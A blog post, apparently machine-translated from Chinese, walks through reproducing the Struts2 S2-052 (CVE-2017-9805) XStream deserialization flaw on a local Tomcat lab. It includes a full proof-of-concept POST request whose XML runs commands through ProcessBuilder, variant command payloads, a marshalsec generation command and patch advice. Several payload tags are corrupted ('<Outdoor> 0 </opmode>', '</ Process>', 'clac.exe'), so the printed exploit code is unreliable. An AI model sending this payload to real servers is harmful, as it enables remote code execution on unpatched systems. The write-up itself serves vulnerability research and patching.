struts2-052 vulnerability

From small beginnings comes great things
Great begins with small

This year, struts2 is crazy, and many high-risk vulnerabilities have been exploded. I have studied s_045 and s_046 vulnerabilities before, and recently there was a s_052 vulnerability. The s_052 vulnerability is slightly less dangerous, because the environment is more demanding and requires the XStream component of the Struts2 REST plugin.

Disclaimer: * The tools in the article are for personal testing and research. Please delete them within 24 hours after downloading. Do not use them for commercial or illegal purposes.

s2-052 Vulnerability Introduction

The s2-052 vulnerability is when the user uses the Struts-REST plugin with the XStream component to deserialize the XML format packet. The data content is not validated and the malicious code can be inserted directly into the packet.

Vulnerability ID: CVE-2017-9805 (S2-052)

s2-052 little

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2365
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<Outdoor> 0 </opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</ Process>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer> </ ibuffer>
<done>false</done>
<ostart> 0 </ ostart>
<off> 0 </ ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<DataLen> 0 </ dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>

Note: The place to execute the command is in the command, here is the pop-up calculator for mac, if it is windows can be changed to calc.exe

1
2
3
4
5
<command>
<string>
/Applications/Calculator.app/Contents/MacOS/Calculator
</string>
</command>

s2-052 Vulnerability Recurrence

mac install tomcat

Before installing tomcat, first check if there is java installed on the mac, you can run java -version.

1
2
3
java version "1.8.0_111"
Java(TM) SE Runtime Environment (build 1.8.0_111-b14)
Java HotSpot(TM) 64-Bit Server VM (build 25.111-b14, mixed mode)

Go to the tomcat website to download: http://tomcat.apache.org/download-80.cgi?from_33lc.com Select to download the tar.gz package under the Core to the local, and then extract.
After extracting, move the folder to the /Library directory and name it Tomcat; then set the permissions:

1
sudo chmod 755 /Library/Tomcat/bin/*.sh

Go to the /Library/Tomcat/bin/ directory and run boot tomcat.

1
sudo sh startup.sh

Visit: http://127.0.0.1:8080
Note: To modify the tomcat port, open the /Library/Tomcat/conf/server.xml file and modify port 8080.

Write a startup to close the tomcat script:
Write the following to the tomcat file (create it yourself)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/bash
case $1 in
start)
sh /Library/Tomcat/bin/startup.sh
;;
stop)
sh /Library/Tomcat/bin/shutdown.sh
;;
restart)
sh /Library/Tomcat/bin/shutdown.sh
sh /Library/Tomcat/bin/startup.sh
;;
*)
;;
esac
exit 0

Give file permissions:

1
chmod 777 tomcat

Add an environment variable:

1
export PATH="$PATH:/Library/Tomcat/bin"

Then run the startup to close tomcat:

1
2
sudo tomcat start
sudo tomcat stop

Note: The linux and windows installation tomcat methods are similar, and will not be demonstrated here.

Download the struts2 version of the deployed vulnerability

After downloading the last affected version [struts-2.5.12] (http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip) from the official website of struts2, The struts2-rest-showcase.war file in the apps directory is placed in the webapps directory (/Library/Tomcat/webapps) and restarted after tomcat: http://127.0.0.1:8080/struts2-rest-showcase/


Since the port monitored by burpsuite is also 8080, I changed the port of tomcat to 8081.

Constructing a post package

You can use the above poc package directly, or you can grab the packet replay yourself. The way to grab it yourself is to click on the edit on the page, then click submit to submit the post package, and then modify the body field of the post for this vulnerability. Poc.

Try different poc

The most used poc on the Internet is popping up a calculator. However, I tested on the mac and found that the popup calculator failed. Therefore, I changed the poc to write the file and found the test to be successful.

Write the file poc: (will generate vuln file under /tmp/)

1
<command><string>/usr/bin/touch</string><string>/tmp/vuln</string> </command>

Bullet calculator poc

1
2
3
4
5
Mac:
<command><string>/Applications/Calculator.app/Contents/MacOS/Calculator</string></command>
windows:
<command><string>clac.exe</string></command>

poc generation

1
java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO calc.exe > poc.txt

Marshalsec-0.0.1-SNAPSHOT-all.jar can be downloaded online, no address is given here, search by yourself.

Repair method

  • Upgrade Struts to the latest version of 2.5.13.
  • Remove the Struts REST plugin when not in use, or only on server normal pages and JSONs

python verification script

https://github.com/ysrc/xunfeng/commit/f9ae69fe176c8bca622831e126cd94414ebe26f6?from=timeline&isappinstalled=0

Reference article

http://www.freebuf.com/vuls/146718.html
https://www.t00ls.net/thread-41942-1-1.html
http://www.imooc.com/article/6453
https://github.com/jas502n/St2-052/blob/master/README.md

Portal

[struts2-046 vulnerability] (http://thief.one/2017/03/21/Struts2-046%E6%BC%8F%E6%B4%9E/)
[struts2_045 vulnerability] (http://thief.one/2017/03/07/Struts2-045%E6%BC%8F%E6%B4%9E/)
[struts2 vulnerability poc summary] (http://thief.one/2017/03/13/Struts2%E6%BC%8F%E6%B4%9EPOC%E6%B1%87%E6%80%BB/)

本文标题:struts2-052 vulnerability

文章作者:nmask

发布时间:2017年09月06日 - 16:09

最后更新:2019年07月11日 - 18:07

原始链接:https://thief.one/2017/09/06/1/en/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: